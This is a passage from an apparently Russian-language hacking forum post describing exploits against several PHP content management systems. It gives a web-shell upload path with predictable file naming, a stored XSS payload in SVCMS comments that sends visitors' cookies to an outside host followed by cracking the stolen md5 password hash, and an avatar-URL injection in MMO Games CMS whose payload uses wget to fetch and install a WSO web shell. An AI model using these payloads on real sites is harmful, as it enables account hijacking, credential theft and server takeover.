шелл "в открытом виде". -> Методика именования заливаемых файлов следующая: PHP: $ShellName = md5($_FILES['name']) . "_" . $_FILES['name']; -> То бишь заливая шелл shell.php будет именован(и расположен): Code: site.com/resources/audiodir/25a452927110e39a345a2511c57647f2_shell.php
SVCMS beta 1 (угоняем куки) Еще один двиг не без прибабаха... Мега кодеры этого двига при авторизации выдают след.куки: Code: __qca=P0-464638314-1305237775445; crocmint_aff=697b75; POSTAff2Cookie=697b75_137d839c; POSTAff2TimeCookie=1305037573_1308127486_7; POSTAff2ClickCookie=d9913101; PAPR_0=1305557527_http%253A//temp/; [COLOR=DarkRed][B]SVCMS_userid=1; SVCMS_md5passwd=e5c72dd4eca5301feca1bb0985eed55f; [/B][/COLOR] SVCMS_randomstring=13123908414e397eb92e187; PHPSESSID=bmkmssmcvtbcoreee5uqj49vp6 наблюдаем это здесь(user.php): PHP: ..... * Set the cookies */ private function set_login_cookies($logout = false) { $expire_val = ( ( $logout ) ? ( time() - 30 ) : time() + 1209600); // 1209600 is two weeks $randomstring = uniqid(time()); $md5_pass = md5($this->data['password'] . $randomstring); $cookies = array( 'SVCMS_userid' => $this->data['userid'], 'SVCMS_md5passwd' => $md5_pass, 'SVCMS_randomstring' => $randomstring, ); foreach($cookies as $cookie => $cookie_value) { setcookie($cookie, $cookie_value, $expire_val, '/', ''); } return true; } ......... И в добавок к этому они оставили активную xss в комментах! То бишь: Code: <script> img = new Image(); img.src = "http://day.mne/svoi.kuki?ciuda="+document.cookie; </script> -> Регулярим id и хэш, а так же $_SERVER['HTTP_REFERER'] -> брутим хэш (md5) -> возвращаемся на $_SERVER['HTTP_REFERER'] -> смотрим ник по id (ссылка на нике комментирующих) -> действуем по совести
MMO Games CMS 1.2 Final [shell upload] (вроде "линеечный" двиг) Есть файл, в нем функция, обновляющая запись таблицы 'accounts' (конкретно - поле урла авы) functions.php PHP: <?php /* * Open-Source Project: MMOGames CMS * * Software by: The Community 51 * * Support, Updates: www.l2jexodus.com * * Copyright Nikolaj Schepsen 2010-2011 */ #------------------------------------------------------------------------------ # L2jEXODUS's CUSTOM MODDIFICATIONs - ::: START ::: function safe($value) { $value = htmlentities($value); return $value; } if(isset($_GET ['action']) && $_GET ['action'] == "login") { function UserIDCheck($username, $password) { $username = addslashes(mysql_real_escape_string($username)); $password = addslashes(mysql_real_escape_string($password)); $status->allow = false; $sqlQuery = "SELECT `login`, `password` FROM `accounts` WHERE `login` = '$username'"; if(($records = mysql_query($sqlQuery)) !== false) { $password = base64_encode(pack("H*", sha1(utf8_encode($password)))); $row = mysql_fetch_object($records); if($password == $row->password) { $_SESSION ['UserID'] = $row->login; header("location: index.php"); } } } UserIDCheck($_POST ['UserID'], $_POST ['Password']); } if(isset($_GET ['update']) && $_GET ['update'] == "avatarurl") { $avatarURL = safe($_POST ['avatarURL']); mysql_query("UPDATE `accounts` SET `avatar`='$avatarURL' WHERE `login`=' . $_SESSION['UserID'] . '"); } # L2jEXODUS's CUSTOM MODDIFICATIONs - :::: END :::: #------------------------------------------------------------------------------ ?> И если передать в POST запросе (на site.com/index.php?update=avatarurl) единственный параметр avatarURL со значением Code: <? system('wget http://site.com/wso.txt -O путь_до_корня/uploads/wso.php'); ?> то можно получить в полне готовый шелл... путь_до_корня - site.com/includes/sidemenu.php
